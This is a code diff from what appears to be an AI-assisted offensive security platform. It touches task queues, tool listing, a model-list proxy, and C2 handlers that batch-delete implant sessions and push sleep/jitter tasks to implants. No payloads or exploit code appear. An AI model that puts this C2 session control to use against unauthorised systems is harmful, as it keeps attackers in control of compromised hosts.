||||||
|
})
|
||||||
|
cb("reasoning_chain_stream_delta", "step one", openai.WithSSEAccumulated(map[string]interface{}{
|
||||||
|
"streamId": streamID,
|
||||||
|
}, "step one"))
|
||||||
|
cb("done", "", map[string]interface{}{"conversationId": conv.ID})
|
||||||
|
|
||||||
|
details, err := db.GetProcessDetails(asst.ID)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetProcessDetails: %v", err)
|
||||||
|
}
|
||||||
|
found := false
|
||||||
|
for _, d := range details {
|
||||||
|
if d.EventType == "reasoning_chain" && d.Message == "step one" {
|
||||||
|
found = true
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !found {
|
||||||
|
t.Fatalf("expected reasoning_chain persisted on done, got %+v", details)
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -2,7 +2,6 @@ package handler
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"strconv"
|
"strconv"
|
||||||
"time"
|
|
||||||
|
|
||||||
"cyberstrike-ai/internal/database"
|
"cyberstrike-ai/internal/database"
|
||||||
|
|
||||||
@@ -20,12 +19,12 @@ func auditFilterFromQuery(c *gin.Context) database.ListAuditLogsFilter {
|
|||||||
ResourceID: c.Query("resource_id"),
|
ResourceID: c.Query("resource_id"),
|
||||||
}
|
}
|
||||||
if since := c.Query("since"); since != "" {
|
if since := c.Query("since"); since != "" {
|
||||||
if t, err := time.Parse(time.RFC3339, since); err == nil {
|
if t, err := database.ParseRFC3339Time(since); err == nil {
|
||||||
filter.Since = &t
|
filter.Since = &t
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
if until := c.Query("until"); until != "" {
|
if until := c.Query("until"); until != "" {
|
||||||
if t, err := time.Parse(time.RFC3339, until); err == nil {
|
if t, err := database.ParseRFC3339Time(until); err == nil {
|
||||||
filter.Until = &t
|
filter.Until = &t
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -77,11 +77,12 @@ type BatchTaskQueue struct {
|
|||||||
|
|
||||||
// BatchTaskManager 批量任务管理器
|
// BatchTaskManager 批量任务管理器
|
||||||
type BatchTaskManager struct {
|
type BatchTaskManager struct {
|
||||||
db *database.DB
|
db *database.DB
|
||||||
logger *zap.Logger
|
logger *zap.Logger
|
||||||
queues map[string]*BatchTaskQueue
|
queues map[string]*BatchTaskQueue
|
||||||
taskCancels map[string]context.CancelFunc // 存储每个队列当前任务的取消函数
|
taskCancels map[string]context.CancelFunc // 存储每个队列当前任务的取消函数
|
||||||
mu sync.RWMutex
|
singleRunTasks map[string]string // queueID -> taskID,单条执行完成后暂停队列
|
||||||
|
mu sync.RWMutex
|
||||||
}
|
}
|
||||||
|
|
||||||
// NewBatchTaskManager 创建批量任务管理器
|
// NewBatchTaskManager 创建批量任务管理器
|
||||||
@@ -90,9 +91,10 @@ func NewBatchTaskManager(logger *zap.Logger) *BatchTaskManager {
|
|||||||
logger = zap.NewNop()
|
logger = zap.NewNop()
|
||||||
}
|
}
|
||||||
return &BatchTaskManager{
|
return &BatchTaskManager{
|
||||||
logger: logger,
|
logger: logger,
|
||||||
queues: make(map[string]*BatchTaskQueue),
|
queues: make(map[string]*BatchTaskQueue),
|
||||||
taskCancels: make(map[string]context.CancelFunc),
|
taskCancels: make(map[string]context.CancelFunc),
|
||||||
|
singleRunTasks: make(map[string]string),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -864,6 +866,138 @@ func (m *BatchTaskManager) AddTaskToQueue(queueID, message string) (*BatchTask,
|
|||||||
return task, nil
|
return task, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// PrepareSingleTaskRun 准备单条执行:重置目标任务(若已有结果)并定位队列索引
|
||||||
|
func (m *BatchTaskManager) PrepareSingleTaskRun(queueID, taskID string) error {
|
||||||
|
var cancelFunc context.CancelFunc
|
||||||
|
var siblingRunningIDs []string
|
||||||
|
|
||||||
|
m.mu.Lock()
|
||||||
|
queue, exists := m.queues[queueID]
|
||||||
|
if !exists {
|
||||||
|
m.mu.Unlock()
|
||||||
|
return fmt.Errorf("队列不存在")
|
||||||
|
}
|
||||||
|
|
||||||
|
var task *BatchTask
|
||||||
|
taskIndex := -1
|
||||||
|
for i, t := range queue.Tasks {
|
||||||
|
if t.ID == taskID {
|
||||||
|
taskIndex = i
|
||||||
|
task = t
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if task == nil {
|
||||||
|
m.mu.Unlock()
|
||||||
|
return fmt.Errorf("任务不存在")
|
||||||
|
}
|
||||||
|
|
||||||
|
if !queueAllowsSingleTaskRunLocked(queue, task) {
|
||||||
|
m.mu.Unlock()
|
||||||
|
return fmt.Errorf("队列正在执行或未就绪,无法单条执行")
|
||||||
|
}
|
||||||
|
|
||||||
|
// 暂停态:中止在途子任务并收口仍标记 running 的其它子任务,以便单条执行非冲突项
|
||||||
|
if queue.Status == BatchQueueStatusPaused {
|
||||||
|
if c, ok := m.taskCancels[queueID]; ok {
|
||||||
|
cancelFunc = c
|
||||||
|
delete(m.taskCancels, queueID)
|
||||||
|
}
|
||||||
|
for _, t := range queue.Tasks {
|
||||||
|
if t != nil && t.ID != taskID && t.Status == BatchTaskStatusRunning {
|
||||||
|
siblingRunningIDs = append(siblingRunningIDs, t.ID)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
needsReset := task.Status != BatchTaskStatusPending
|
||||||
|
resumeQueue := queue.Status == BatchQueueStatusCompleted || queue.Status == BatchQueueStatusCancelled
|
||||||
|
m.mu.Unlock()
|
||||||
|
|
||||||
|
if cancelFunc != nil {
|
||||||
|
cancelFunc()
|
||||||
|
}
|
||||||
|
const staleRunMsg = "为单条执行其它任务,已中止"
|
||||||
|
for _, sid := range siblingRunningIDs {
|
||||||
|
m.UpdateTaskStatus(queueID, sid, BatchTaskStatusCancelled, "", staleRunMsg)
|
||||||
|
}
|
||||||
|
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
queue, exists = m.queues[queueID]
|
||||||
|
if !exists {
|
||||||
|
return fmt.Errorf("队列不存在")
|
||||||
|
}
|
||||||
|
|
||||||
|
task = nil
|
||||||
|
taskIndex = -1
|
||||||
|
for i, t := range queue.Tasks {
|
||||||
|
if t.ID == taskID {
|
||||||
|
taskIndex = i
|
||||||
|
task = t
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if task == nil {
|
||||||
|
return fmt.Errorf("任务不存在")
|
||||||
|
}
|
||||||
|
|
||||||
|
if m.db != nil {
|
||||||
|
if err := m.db.PrepareBatchSingleTaskRun(queueID, taskID, taskIndex, needsReset, resumeQueue); err != nil {
|
||||||
|
return fmt.Errorf("准备单条执行失败: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if needsReset {
|
||||||
|
task.Status = BatchTaskStatusPending
|
||||||
|
task.ConversationID = ""
|
||||||
|
task.StartedAt = nil
|
||||||
|
task.CompletedAt = nil
|
||||||
|
task.Error = ""
|
||||||
|
task.Result = ""
|
||||||
|
}
|
||||||
|
queue.CurrentIndex = taskIndex
|
||||||
|
queue.LastRunError = ""
|
||||||
|
if resumeQueue {
|
||||||
|
queue.Status = BatchQueueStatusPaused
|
||||||
|
queue.CompletedAt = nil
|
||||||
|
}
|
||||||
|
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// SetSingleRunTask 标记队列仅执行指定子任务,完成后自动暂停
|
||||||
|
func (m *BatchTaskManager) SetSingleRunTask(queueID, taskID string) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
if m.singleRunTasks == nil {
|
||||||
|
m.singleRunTasks = make(map[string]string)
|
||||||
|
}
|
||||||
|
m.singleRunTasks[queueID] = taskID
|
||||||
|
}
|
||||||
|
|
||||||
|
// ClearSingleRunTask 清除单条执行标记
|
||||||
|
func (m *BatchTaskManager) ClearSingleRunTask(queueID string) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
delete(m.singleRunTasks, queueID)
|
||||||
|
}
|
||||||
|
|
||||||
|
// TakeSingleRunTaskIfMatch 若刚完成的子任务为单条执行目标,则清除标记并返回 true
|
||||||
|
func (m *BatchTaskManager) TakeSingleRunTaskIfMatch(queueID, taskID string) bool {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
if m.singleRunTasks == nil {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if m.singleRunTasks[queueID] != taskID {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
delete(m.singleRunTasks, queueID)
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
// DeleteTask 删除任务(队列空闲时可删;执行中任务不可删)
|
// DeleteTask 删除任务(队列空闲时可删;执行中任务不可删)
|
||||||
func (m *BatchTaskManager) DeleteTask(queueID, taskID string) error {
|
func (m *BatchTaskManager) DeleteTask(queueID, taskID string) error {
|
||||||
m.mu.Lock()
|
m.mu.Lock()
|
||||||
@@ -936,6 +1070,25 @@ func queueAllowsTaskListMutationLocked(queue *BatchTaskQueue) bool {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// queueAllowsSingleTaskRunLocked 是否允许对指定子任务发起单条执行(必须在持有 BatchTaskManager.mu 下调用)
|
||||||
|
func queueAllowsSingleTaskRunLocked(queue *BatchTaskQueue, task *BatchTask) bool {
|
||||||
|
if queue == nil || task == nil {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if task.Status == BatchTaskStatusRunning {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if queue.Status == BatchQueueStatusRunning {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
switch queue.Status {
|
||||||
|
case BatchQueueStatusPending, BatchQueueStatusPaused, BatchQueueStatusCompleted, BatchQueueStatusCancelled:
|
||||||
|
return true
|
||||||
|
default:
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
// GetNextTask 获取下一个待执行的任务
|
// GetNextTask 获取下一个待执行的任务
|
||||||
func (m *BatchTaskManager) GetNextTask(queueID string) (*BatchTask, bool) {
|
func (m *BatchTaskManager) GetNextTask(queueID string) (*BatchTask, bool) {
|
||||||
m.mu.Lock()
|
m.mu.Lock()
|
||||||
|
|||||||
+58
-3
@@ -1,6 +1,7 @@
|
|||||||
package handler
|
package handler
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"database/sql"
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"errors"
|
"errors"
|
||||||
"fmt"
|
"fmt"
|
||||||
@@ -277,6 +278,9 @@ func (h *C2Handler) ListSessions(c *gin.Context) {
|
|||||||
filter.Limit = n
|
filter.Limit = n
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
if c.Query("suspicious") == "1" || strings.EqualFold(c.Query("suspicious"), "true") {
|
||||||
|
filter.Suspicious = true
|
||||||
|
}
|
||||||
|
|
||||||
sessions, err := h.mgr().DB().ListC2Sessions(filter)
|
sessions, err := h.mgr().DB().ListC2Sessions(filter)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -324,7 +328,37 @@ func (h *C2Handler) DeleteSession(c *gin.Context) {
|
|||||||
c.JSON(http.StatusOK, gin.H{"deleted": true})
|
c.JSON(http.StatusOK, gin.H{"deleted": true})
|
||||||
}
|
}
|
||||||
|
|
||||||
// SetSessionSleep 设置会话的 sleep/jitter
|
// DeleteSessions 批量删除会话(请求体 JSON: {"ids":["s_xxx",...]})
|
||||||
|
func (h *C2Handler) DeleteSessions(c *gin.Context) {
|
||||||
|
var req struct {
|
||||||
|
IDs []string `json:"ids"`
|
||||||
|
}
|
||||||
|
if err := c.ShouldBindJSON(&req); err != nil {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid json: " + err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if len(req.IDs) == 0 {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": "ids is required"})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
n, err := h.mgr().DB().DeleteC2SessionsByIDs(req.IDs)
|
||||||
|
if err != nil {
|
||||||
|
if errors.Is(err, database.ErrNoValidC2SessionIDs) {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if h.audit != nil {
|
||||||
|
h.audit.RecordOK(c, "c2", "session_delete", "批量删除 C2 会话", "c2_session", "", map[string]interface{}{
|
||||||
|
"count": n, "ids": req.IDs,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, gin.H{"deleted": n})
|
||||||
|
}
|
||||||
|
|
||||||
|
// SetSessionSleep 设置会话的 sleep/jitter,并下发 sleep 任务到植入体
|
||||||
func (h *C2Handler) SetSessionSleep(c *gin.Context) {
|
func (h *C2Handler) SetSessionSleep(c *gin.Context) {
|
||||||
id := c.Param("id")
|
id := c.Param("id")
|
||||||
var req struct {
|
var req struct {
|
||||||
@@ -335,12 +369,33 @@ func (h *C2Handler) SetSessionSleep(c *gin.Context) {
|
|||||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
if req.SleepSeconds < 1 {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": "sleep_seconds must be >= 1"})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if req.JitterPercent < 0 || req.JitterPercent > 100 {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": "jitter_percent must be 0-100"})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
if err := h.mgr().DB().SetC2SessionSleep(id, req.SleepSeconds, req.JitterPercent); err != nil {
|
task, err := h.mgr().SetSessionSleep(id, req.SleepSeconds, req.JitterPercent)
|
||||||
|
if err != nil {
|
||||||
|
if errors.Is(err, sql.ErrNoRows) {
|
||||||
|
c.JSON(http.StatusNotFound, gin.H{"error": "session not found"})
|
||||||
|
return
|
||||||
|
}
|
||||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
c.JSON(http.StatusOK, gin.H{"updated": true})
|
out := gin.H{
|
||||||
|
"updated": true,
|
||||||
|
"sleep_seconds": req.SleepSeconds,
|
||||||
|
"jitter_percent": req.JitterPercent,
|
||||||
|
}
|
||||||
|
if task != nil {
|
||||||
|
out["task_id"] = task.ID
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, out)
|
||||||
}
|
}
|
||||||
|
|
||||||
// ============================================================================
|
// ============================================================================
|
||||||
|
|||||||
+182
-74
@@ -298,7 +298,7 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// 获取外部MCP工具
|
// 获取外部MCP工具(走缓存,持锁期间通常不阻塞)
|
||||||
if h.externalMCPMgr != nil {
|
if h.externalMCPMgr != nil {
|
||||||
ctx := context.Background()
|
ctx := context.Background()
|
||||||
externalTools := h.getExternalMCPTools(ctx)
|
externalTools := h.getExternalMCPTools(ctx)
|
||||||
@@ -359,9 +359,6 @@ type GetToolsResponse struct {
|
|||||||
|
|
||||||
// GetTools 获取工具列表(支持分页和搜索)
|
// GetTools 获取工具列表(支持分页和搜索)
|
||||||
func (h *ConfigHandler) GetTools(c *gin.Context) {
|
func (h *ConfigHandler) GetTools(c *gin.Context) {
|
||||||
h.mu.RLock()
|
|
||||||
defer h.mu.RUnlock()
|
|
||||||
|
|
||||||
c.Header("Cache-Control", "no-store, no-cache, must-revalidate")
|
c.Header("Cache-Control", "no-store, no-cache, must-revalidate")
|
||||||
|
|
||||||
// 解析分页参数
|
// 解析分页参数
|
||||||
@@ -407,12 +404,37 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
includeExternal := true
|
||||||
|
if v := strings.TrimSpace(strings.ToLower(c.Query("include_external"))); v == "0" || v == "false" || v == "no" {
|
||||||
|
includeExternal = false
|
||||||
|
}
|
||||||
|
refreshExternal := false
|
||||||
|
if v := strings.TrimSpace(strings.ToLower(c.Query("refresh_external"))); v == "1" || v == "true" || v == "yes" {
|
||||||
|
refreshExternal = true
|
||||||
|
}
|
||||||
|
|
||||||
|
// 按外部 MCP 名称筛选(MCP 管理页左侧卡片 → 右侧工具列表联动)
|
||||||
|
externalMCPFilter := strings.TrimSpace(c.Query("external_mcp"))
|
||||||
|
|
||||||
|
// 快照配置后立即释放锁,避免外部 MCP 网络 IO 阻塞整个配置子系统
|
||||||
|
h.mu.RLock()
|
||||||
|
securityTools := append([]config.ToolConfig(nil), h.config.Security.Tools...)
|
||||||
|
roles := h.config.Roles
|
||||||
|
toolDescriptionMode := h.config.Security.ToolDescriptionMode
|
||||||
|
mcpServer := h.mcpServer
|
||||||
|
externalMCPMgr := h.externalMCPMgr
|
||||||
|
h.mu.RUnlock()
|
||||||
|
|
||||||
|
pickDesc := func(shortDesc, fullDesc string) string {
|
||||||
|
return pickToolDescriptionWithMode(toolDescriptionMode, shortDesc, fullDesc)
|
||||||
|
}
|
||||||
|
|
||||||
// 解析角色参数,用于过滤工具并标注启用状态
|
// 解析角色参数,用于过滤工具并标注启用状态
|
||||||
roleName := c.Query("role")
|
roleName := c.Query("role")
|
||||||
var roleToolsSet map[string]bool // 角色配置的工具集合
|
var roleToolsSet map[string]bool // 角色配置的工具集合
|
||||||
var roleUsesAllTools bool = true // 角色是否使用所有工具(默认角色)
|
var roleUsesAllTools bool = true // 角色是否使用所有工具(默认角色)
|
||||||
if roleName != "" && roleName != "默认" && h.config.Roles != nil {
|
if roleName != "" && roleName != "默认" && roles != nil {
|
||||||
if role, exists := h.config.Roles[roleName]; exists && role.Enabled {
|
if role, exists := roles[roleName]; exists && role.Enabled {
|
||||||
if len(role.Tools) > 0 {
|
if len(role.Tools) > 0 {
|
||||||
// 角色配置了工具列表,只使用这些工具
|
// 角色配置了工具列表,只使用这些工具
|
||||||
roleToolsSet = make(map[string]bool)
|
roleToolsSet = make(map[string]bool)
|
||||||
@@ -426,12 +448,12 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
|||||||
|
|
||||||
// 获取所有内部工具并应用搜索过滤
|
// 获取所有内部工具并应用搜索过滤
|
||||||
configToolMap := make(map[string]bool)
|
configToolMap := make(map[string]bool)
|
||||||
allTools := make([]ToolConfigInfo, 0, len(h.config.Security.Tools))
|
allTools := make([]ToolConfigInfo, 0, len(securityTools))
|
||||||
for _, tool := range h.config.Security.Tools {
|
for _, tool := range securityTools {
|
||||||
configToolMap[tool.Name] = true
|
configToolMap[tool.Name] = true
|
||||||
toolInfo := ToolConfigInfo{
|
toolInfo := ToolConfigInfo{
|
||||||
Name: tool.Name,
|
Name: tool.Name,
|
||||||
Description: h.pickToolDescription(tool.ShortDescription, tool.Description),
|
Description: pickDesc(tool.ShortDescription, tool.Description),
|
||||||
Enabled: tool.Enabled,
|
Enabled: tool.Enabled,
|
||||||
IsExternal: false,
|
IsExternal: false,
|
||||||
}
|
}
|
||||||
@@ -479,15 +501,15 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// 从MCP服务器获取所有已注册的工具(包括直接注册的工具,如知识检索工具)
|
// 从MCP服务器获取所有已注册的工具(包括直接注册的工具,如知识检索工具)
|
||||||
if h.mcpServer != nil {
|
if mcpServer != nil {
|
||||||
mcpTools := h.mcpServer.GetAllTools()
|
mcpTools := mcpServer.GetAllTools()
|
||||||
for _, mcpTool := range mcpTools {
|
for _, mcpTool := range mcpTools {
|
||||||
// 跳过已经在配置文件中的工具(避免重复)
|
// 跳过已经在配置文件中的工具(避免重复)
|
||||||
if configToolMap[mcpTool.Name] {
|
if configToolMap[mcpTool.Name] {
|
||||||
continue
|
continue
|
||||||
}
|
}
|
||||||
|
|
||||||
description := h.pickToolDescription(mcpTool.ShortDescription, mcpTool.Description)
|
description := pickDesc(mcpTool.ShortDescription, mcpTool.Description)
|
||||||
|
|
||||||
toolInfo := ToolConfigInfo{
|
toolInfo := ToolConfigInfo{
|
||||||
Name: mcpTool.Name,
|
Name: mcpTool.Name,
|
||||||
@@ -534,11 +556,13 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// 获取外部MCP工具
|
// 获取外部MCP工具(可走缓存,不持有 config 锁)
|
||||||
if h.externalMCPMgr != nil {
|
if includeExternal && externalMCPMgr != nil {
|
||||||
// 创建context用于获取外部工具
|
if refreshExternal {
|
||||||
|
externalMCPMgr.InvalidateAllToolCaches()
|
||||||
|
}
|
||||||
ctx := context.Background()
|
ctx := context.Background()
|
||||||
externalTools := h.getExternalMCPTools(ctx)
|
externalTools := h.getExternalMCPToolsWithManager(ctx, externalMCPMgr, pickDesc)
|
||||||
|
|
||||||
// 应用搜索过滤和角色配置
|
// 应用搜索过滤和角色配置
|
||||||
for _, toolInfo := range externalTools {
|
for _, toolInfo := range externalTools {
|
||||||
@@ -585,6 +609,16 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
|||||||
// 注意:这里我们不直接过滤掉工具,而是保留所有工具,但通过 role_enabled 字段标注状态
|
// 注意:这里我们不直接过滤掉工具,而是保留所有工具,但通过 role_enabled 字段标注状态
|
||||||
// 这样前端可以显示所有工具,并标注哪些工具在当前角色中可用
|
// 这样前端可以显示所有工具,并标注哪些工具在当前角色中可用
|
||||||
|
|
||||||
|
if externalMCPFilter != "" {
|
||||||
|
filtered := make([]ToolConfigInfo, 0)
|
||||||
|
for _, tool := range allTools {
|
||||||
|
if tool.IsExternal && tool.ExternalMCP == externalMCPFilter {
|
||||||
|
filtered = append(filtered, tool)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
allTools = filtered
|
||||||
|
}
|
||||||
|
|
||||||
// 统一按名称排序后再分页,避免配置文件中顺序导致「全部」与「仅已启用」前几页看起来完全一致
|
// 统一按名称排序后再分页,避免配置文件中顺序导致「全部」与「仅已启用」前几页看起来完全一致
|
||||||
sort.SliceStable(allTools, func(i, j int) bool {
|
sort.SliceStable(allTools, func(i, j int) bool {
|
||||||
key := func(t ToolConfigInfo) string {
|
key := func(t ToolConfigInfo) string {
|
||||||
@@ -654,11 +688,9 @@ type UpdateConfigRequest struct {
|
|||||||
// AgentConfigUpdate 用于 PATCH /api/config 的 agent 段:仅 JSON 中出现的字段(指针非 nil)覆盖内存配置。
|
// AgentConfigUpdate 用于 PATCH /api/config 的 agent 段:仅 JSON 中出现的字段(指针非 nil)覆盖内存配置。
|
||||||
// 避免旧版「整包替换 *AgentConfig」时,未传的整型字段被反序列化为 0 误覆盖(例如 tool_timeout_minutes 变成 0)。
|
// 避免旧版「整包替换 *AgentConfig」时,未传的整型字段被反序列化为 0 误覆盖(例如 tool_timeout_minutes 变成 0)。
|
||||||
type AgentConfigUpdate struct {
|
type AgentConfigUpdate struct {
|
||||||
MaxIterations *int `json:"max_iterations,omitempty"`
|
MaxIterations *int `json:"max_iterations,omitempty"`
|
||||||
LargeResultThreshold *int `json:"large_result_threshold,omitempty"`
|
ToolTimeoutMinutes *int `json:"tool_timeout_minutes,omitempty"`
|
||||||
ResultStorageDir *string `json:"result_storage_dir,omitempty"`
|
SystemPromptPath *string `json:"system_prompt_path,omitempty"`
|
||||||
ToolTimeoutMinutes *int `json:"tool_timeout_minutes,omitempty"`
|
|
||||||
SystemPromptPath *string `json:"system_prompt_path,omitempty"`
|
|
||||||
}
|
}
|
||||||
|
|
||||||
func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) {
|
func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) {
|
||||||
@@ -668,12 +700,6 @@ func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) {
|
|||||||
if src.MaxIterations != nil {
|
if src.MaxIterations != nil {
|
||||||
dst.MaxIterations = *src.MaxIterations
|
dst.MaxIterations = *src.MaxIterations
|
||||||
}
|
}
|
||||||
if src.LargeResultThreshold != nil {
|
|
||||||
dst.LargeResultThreshold = *src.LargeResultThreshold
|
|
||||||
}
|
|
||||||
if src.ResultStorageDir != nil {
|
|
||||||
dst.ResultStorageDir = *src.ResultStorageDir
|
|
||||||
}
|
|
||||||
if src.ToolTimeoutMinutes != nil {
|
if src.ToolTimeoutMinutes != nil {
|
||||||
dst.ToolTimeoutMinutes = *src.ToolTimeoutMinutes
|
dst.ToolTimeoutMinutes = *src.ToolTimeoutMinutes
|
||||||
}
|
}
|
||||||
@@ -1042,6 +1068,80 @@ func (h *ConfigHandler) TestOpenAI(c *gin.Context) {
|
|||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// ListModelsRequest 获取模型列表请求(OpenAI 兼容 GET /models)。
|
||||||
|
type ListModelsRequest struct {
|
||||||
|
Provider string `json:"provider"`
|
||||||
|
BaseURL string `json:"base_url"`
|
||||||
|
APIKey string `json:"api_key"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListModels 代理调用上游 GET /models,返回可用模型 id 列表。
|
||||||
|
func (h *ConfigHandler) ListModels(c *gin.Context) {
|
||||||
|
var req ListModelsRequest
|
||||||
|
if err := c.ShouldBindJSON(&req); err != nil {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
provider := strings.TrimSpace(req.Provider)
|
||||||
|
if provider == "" {
|
||||||
|
provider = "openai"
|
||||||
|
}
|
||||||
|
if strings.EqualFold(provider, "claude") {
|
||||||
|
c.JSON(http.StatusOK, gin.H{
|
||||||
|
"success": false,
|
||||||
|
"supported": false,
|
||||||
|
"error": "Claude (Anthropic Messages API) 不支持自动获取模型列表,请手动填写",
|
||||||
|
})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
if strings.TrimSpace(req.APIKey) == "" {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": "API Key 不能为空"})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
baseURL := strings.TrimSuffix(strings.TrimSpace(req.BaseURL), "/")
|
||||||
|
if baseURL == "" {
|
||||||
|
baseURL = "https://api.openai.com/v1"
|
||||||
|
}
|
||||||
|
|
||||||
|
tmpCfg := &config.OpenAIConfig{
|
||||||
|
Provider: provider,
|
||||||
|
BaseURL: baseURL,
|
||||||
|
APIKey: strings.TrimSpace(req.APIKey),
|
||||||
|
}
|
||||||
|
client := openai.NewClient(tmpCfg, nil, h.logger)
|
||||||
|
|
||||||
|
ctx, cancel := context.WithTimeout(c.Request.Context(), 30*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
models, err := client.ListModels(ctx)
|
||||||
|
if err != nil {
|
||||||
|
if apiErr, ok := err.(*openai.APIError); ok {
|
||||||
|
c.JSON(http.StatusOK, gin.H{
|
||||||
|
"success": false,
|
||||||
|
"supported": true,
|
||||||
|
"error": fmt.Sprintf("API 返回错误 (HTTP %d): %s", apiErr.StatusCode, apiErr.Body),
|
||||||
|
})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, gin.H{
|
||||||
|
"success": false,
|
||||||
|
"supported": true,
|
||||||
|
"error": err.Error(),
|
||||||
|
})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
c.JSON(http.StatusOK, gin.H{
|
||||||
|
"success": true,
|
||||||
|
"supported": true,
|
||||||
|
"models": models,
|
||||||
|
"count": len(models),
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
// TestVisionRequest 测试 Vision 模型连接;vision.api_key/base_url 留空时可传 openai 段作回退。
|
// TestVisionRequest 测试 Vision 模型连接;vision.api_key/base_url 留空时可传 openai 段作回退。
|
||||||
type TestVisionRequest struct {
|
type TestVisionRequest struct {
|
||||||
Vision config.VisionConfig `json:"vision"`
|
Vision config.VisionConfig `json:"vision"`
|
||||||
@@ -1498,8 +1598,6 @@ func updateAgentConfig(doc *yaml.Node, agent config.AgentConfig) {
|
|||||||
agentNode := ensureMap(root, "agent")
|
agentNode := ensureMap(root, "agent")
|
||||||
setIntInMap(agentNode, "max_iterations", agent.MaxIterations)
|
setIntInMap(agentNode, "max_iterations", agent.MaxIterations)
|
||||||
setIntInMap(agentNode, "tool_timeout_minutes", agent.ToolTimeoutMinutes)
|
setIntInMap(agentNode, "tool_timeout_minutes", agent.ToolTimeoutMinutes)
|
||||||
setIntInMap(agentNode, "large_result_threshold", agent.LargeResultThreshold)
|
|
||||||
setStringInMap(agentNode, "result_storage_dir", agent.ResultStorageDir)
|
|
||||||
setStringInMap(agentNode, "system_prompt_path", agent.SystemPromptPath)
|
setStringInMap(agentNode, "system_prompt_path", agent.SystemPromptPath)
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -1548,9 +1646,6 @@ func updateVisionConfig(doc *yaml.Node, cfg config.VisionConfig) {
|
|||||||
if strings.TrimSpace(cfg.Detail) != "" {
|
if strings.TrimSpace(cfg.Detail) != "" {
|
||||||
setStringInMap(visionNode, "detail", cfg.Detail)
|
